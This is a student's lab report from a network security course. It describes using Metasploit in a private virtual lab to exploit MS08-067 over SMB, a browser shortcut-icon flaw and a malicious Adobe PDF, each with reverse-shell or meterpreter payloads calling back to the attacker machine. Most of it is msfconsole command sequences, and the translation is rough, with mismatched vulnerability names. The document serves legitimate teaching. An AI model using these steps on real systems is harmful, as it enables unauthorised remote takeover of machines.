2017-2018-2 20155231 "Network Countermeasure Technology" Experiment 5: MSF Basic Application
Experimental content
An active attack practice such as ms08_067
enable msf terminal
msfconsole
Then use the search command to search for the module corresponding to the vulnerability:
search ms08_067
The path name of the penetration attack module is "exploit/windows/smb/ms08_067_netapi" and consists of four parts: module type, target platform, target service and module name.
use exploit/windows/smb/ms08_067_netapi
View information:
show payloads
Select attack payload:
set payload generic/shell_reverse_tcp
View the configuration items required to configure penetration attacks:
show options
View the target platforms that the penetration attack module can successfully penetrate and attack
show targets
- Set attack IP (default port 445)
set RHOST 192.168.241.138
- After success, connect back to the host port 5231
set LPORT 5231
set LHOST 192.168.241.134
The target system type is 5 here (this system has no Data Execution Prevention Feature (DEF)
set target 5
Check whether the value of the option setting after setting is correct:
show options
launch an infiltration attack
exploit
- View Results
ipconfig /all
A browser-targeted attack such as ms11_050
Here is a vulnerability of IE browser found on the Internet: ms14_064 (we are different)
First enter
search ms14_064
Find Vulnerabilities
- Attack the browser, enter
use exploit/windows/browser/ms10_046_shortcut_icon_
- Enter
show payloads
, view the load to select, here is the experimental loadset payload generic/shell_reverse_tcp
show options
Query needs to be configured- enter
set SRVHOST 192.168.241.134
set LHOST 192.168.241.134
set LPORT 5231
Enter the
exploit
generated URL
- Access the URL on the windows side
- Enter on the kuil side
sessions
, you can see a connection with an ID of 1 Then enter
session -i 1
, connect to the connection with ID 1, enter the shell, and get it successfully.
A client-side attack such as Adobe
First, use
search adobe
the searchthen select
use windows/fileformat/adobe_flashplayer_button
3. Then set payload windows/meterpreter/reverse_tcp
, use to show options
view the information to be configured
- Need to configure
LHOST
,LPORT
,FILENAME
input
exploit
, generate pdf fileEnter
use exploit/multi/handler
, set listening port, host number
exploit
start listeningOn the windows side, open 20155231.pdf and connect back successfully
(We are different... Tried many templates, but only succeeded once, no screenshots yet. Most of them are like this, the connection is not successful, and the port is not opened)
Successfully applied any of the auxiliary modules
Use show auxiliary to view auxiliary modules (we are different)
- Select scanner/http/title to scan webpage tags
View configuration, configure LHOST
192.168.241.134
input
exploit
to monitor
Display as shown. But I don't know where the label is recorded, what is the use of this loophole?
Answer questions after the test
- Explain what is exploit, payload, encode in your own words.
- An exploit is an execution vulnerability.
- payload is the payload, a vector template that executes the code
- encode is encoding, disguising our program or code
Practice summary and experience
Because my computer configuration is a bit sloppy. . The two virtual machines opened the card together, and used the computer of the classmate to do the experiment. Successful people are the same, unsuccessful people are different. Check out the problems and solutions encountered by other students in the experiment. Some are resolved, some are still not resolved. . .
What technologies or steps are still missing from actual combat?
Many files generated by vulnerabilities will be checked and killed by the housekeeper. It is a problem to realize the connection back in actual combat, and it is also a problem to induce the target drone to perform operations.